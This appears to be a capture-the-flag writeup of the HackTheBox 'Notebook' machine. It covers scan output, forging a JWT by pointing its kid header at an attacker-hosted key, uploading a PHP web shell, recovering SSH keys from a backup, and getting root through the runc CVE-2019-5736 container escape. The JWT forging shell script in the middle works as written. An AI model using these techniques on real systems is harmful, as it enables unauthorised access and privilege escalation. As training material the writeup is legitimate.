Hello everyone, in this post I will be sharing my writeup for the HTB Notebook machine, a medium Linux box with two ports open: HTTP and SSH. The web server hosts a note-keeping application that requires us to register. After signing up we can see that the application uses a JWT for authentication, and on decoding the cookie we find that the token header carries a kid (Key ID) pointing at a key URL on localhost. Because the server fetches its verification key from that URL, we can generate our own key pair, change the kid to our IP address so the server pulls our key when it verifies the token, and sign a token that makes us admin. As admin we can read notes that mention backups, and we can also upload files; instead of the usual PHP reverse shell I used phpbash to get an interactive web shell and from there a reverse shell. The notes lead us to a directory holding the SSH key for a user, and running sudo -l as that user shows what they can run: a docker exec command that is affected by CVE-2019-5736 in runc, which we use to get root on the host machine.
Rustscan
rustscan -a 10.129.84.245 -- -A -sC -sV
Open 10.129.84.245:22
Open 10.129.84.245:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZwjrB05nGUvacI81YxNqy+6WpPHhIju6c73aoiru9nW/aVhTmOEsSOGoChEXeQeDN67ZN5QW4LFf0tXeQeJqvgO82HtFkUOiN8tt1RpI98SV+hx8scCzpmtAyu1OJSUM3/cL2tEPTcPHAgHTmroWiXxIMPhTFLIoDVBIqmBrORUIwgjIzFUbEDQJXKPkFciofbowVOkHnT+lv5XokU6571wrX/LRJvTNBEAvbbz0HAfvUkne8ycQsW08qk/BugiLnJHLg24YryGdHl5RqqW/42fsUADngFLncy2+/XCo8Pe/erO+7Zw6r4n1qVb0W0BZ+lRflcRss3diM/21R6O0z
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLeuBF/ZBUM0ZBYW4+vgQMhIPWVs2fzv9lmQHoflWFNMP/sFWZDeVneJE0CRSLnYi2y/wwc079bIsQRibay3Fpg=
| 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDg0mzA1xTe9hivlJN4s+7eXaiyIYefpyykHIir3btEA
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: B2F904D3046B07D05F90FB6131602ED2
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
PORT 80 (HTTP)
I went to the login page and tried some basic SQL injection, which went nowhere. I then tried admin:admin and got an error message that told us the admin user exists, so the login form leaks whether a username is valid (username enumeration).
Then I decided to register an account. After registering I tried injecting some HTML into the notes but couldn't get anything out of it. Running dirsearch didn't find anything interesting either. So I intercepted the request with Burp Suite and found a base64-encoded cookie, which I decoded in CyberChef: it turned out to be a JWT whose header carries a kid pointing at a key file on localhost. For JWTs it is easier to visit https://jwt.io, which decodes the header and payload and lets you re-sign the token with your own key.
Now we want to create our own RSA key pair and host it on port 7070, the port used in the original kid. The following gist shows the openssl commands to generate the pair:
https://gist.github.com/ygotthilf/baa58da5c3dd1f69fae9
Notice we get two files, a public and a private key. We want the public one to be hosted, renamed to privKey.key so that the URL in our forged kid serves it, and we sign the token with the private key. In the payload we add admin_cap = true, and in the header we change the kid to point at our machine. Now copy the whole encoded token, replace the cookie with it, and on reloading we will see the admin panel in the navigation bar. A quick check that the server really fetched the key from us is a request for /privKey.key showing up in the log of the web server we started on port 7070.
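The forging step above, written out as a script so it can be repeated without jwt.io. This is an added example for this writeup, not the box's or the application's own code: it generates the key pair with openssl, builds an RS256 token whose kid points at our host, and verifies the result the way a server that trusts the kid URL effectively does (with our own key). The attacker IP 10.10.14.5, the e-mail address and the exact claim names are assumptions; the port 7070 and the file name privKey.key are the ones from the writeup.

```shell
#!/bin/sh
# Forge an RS256 JWT whose "kid" header points at a key we host ourselves.
# Added example for this writeup, not the box's or the app's own code.
# Assumptions (constructed, adjust to your setup):
#   - the target fetches its verification key from the URL in the "kid" header
#   - 10.10.14.5 is our machine and we serve privKey.key from port 7070
#   - the claim names (username, email, admin_cap) follow the writeup
set -eu

KID_URL="${KID_URL:-http://10.10.14.5:7070/privKey.key}"
KEY="${KEY:-privKey.key}"
PUB="${KEY%.key}.pub"

# base64url without padding, as JWT segments require
b64url() {
  openssl base64 -A | tr '+/' '-_' | tr -d '='
}

# undo base64url (restore alphabet and padding) so openssl can decode it
b64url_decode() {
  tr '_-' '/+' | awk '{ l = length($0) % 4; if (l) $0 = $0 substr("==", 1, 4 - l); print }' | openssl base64 -d -A
}

# generate the RSA pair once; the file named in the kid is what we serve
gen_key() {
  [ -f "$KEY" ] || openssl genrsa -out "$KEY" 2048 2>/dev/null
  openssl rsa -in "$KEY" -pubout -out "$PUB" 2>/dev/null
}

# forge_jwt USER EMAIL -> prints a token signed with OUR private key
forge_jwt() {
  hdr=$(printf '{"typ":"JWT","alg":"RS256","kid":"%s"}' "$KID_URL" | b64url)
  pld=$(printf '{"username":"%s","email":"%s","admin_cap":true}' "$1" "$2" | b64url)
  # RS256 is PKCS#1 v1.5 over SHA-256, which is what openssl dgst -sign does
  sig=$(printf '%s.%s' "$hdr" "$pld" | openssl dgst -sha256 -sign "$KEY" -binary | b64url)
  printf '%s.%s.%s\n' "$hdr" "$pld" "$sig"
}

# verify_jwt TOKEN -> 0 if the signature checks out against OUR public key.
# This is the server's view once it has fetched the key from our kid URL:
# the forged token is perfectly valid in its eyes.
verify_jwt() {
  tok=$1
  hdr=${tok%%.*}; rest=${tok#*.}
  pld=${rest%%.*}; sig=${rest#*.}
  sigfile=$(mktemp)
  printf '%s' "$sig" | b64url_decode > "$sigfile" 2>/dev/null || :
  if printf '%s.%s' "$hdr" "$pld" | openssl dgst -sha256 -verify "$PUB" -signature "$sigfile" >/dev/null 2>&1; then
    rm -f "$sigfile"; return 0
  fi
  rm -f "$sigfile"; return 1
}

# Usage: sh forge.sh admin admin@example.com
# then serve the key from the same directory: python3 -m http.server 7070
if [ "${1:-}" != "" ]; then
  gen_key
  forge_jwt "$1" "${2:-$1@example.com}"
fi
```

Paste the printed token into the cookie and watch the web server on port 7070: the request for /privKey.key is the confirmation that the kid is being followed. If the server only ever accepts a private key file at that URL, serve privKey.key itself instead of the .pub file; the signature is the same either way.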
I decided to upload phpbash.php, which gives us a nice interactive shell in the browser. Running linpeas we can see that Docker is installed on the box and that iptables has Docker rules configured. I tried connecting to the Docker daemon with docker -H 127.0.0.1:10101 and 127.0.0.1:8080 but got nowhere, so I was probably doing it wrong.
Going back to the website as admin I saw some notes that I was able to view. In one of them Noah says that he keeps some files in backups. In that directory we can see home.tar.gz. I started a Python web server on the target machine and transferred the archive to my box. Inside it we have the SSH keys for the user noah.
sudo -l shows a docker exec command whose last argument is a * wildcard. This * will accept any argument, so let's see if we can run commands in the container.
Apparently there's a CVE for docker exec, CVE-2019-5736 in runc, and a PoC for it is here:
https://github.com/Frichetten/CVE-2019-5736-PoC
Download the Go source file and compile it on your machine. In the payload, set the command to make /bin/bash SUID; the PoC overwrites the host's runc binary, so the payload runs as root on the host when runc is next invoked. Then compile the Go source with go build docker.go, transfer the binary to the Docker container and execute it, and at the same time run sh in the container through the sudo docker exec command, since that exec is what triggers the overwritten runc. Or, if we simply want a reverse shell, we could use a bash reverse shell payload instead of making /bin/bash SUID. One caveat: this only works when the host runs a runc that predates the fix (Docker 18.09.2 shipped the patched runc), so check the version reported by docker version before spending time on it.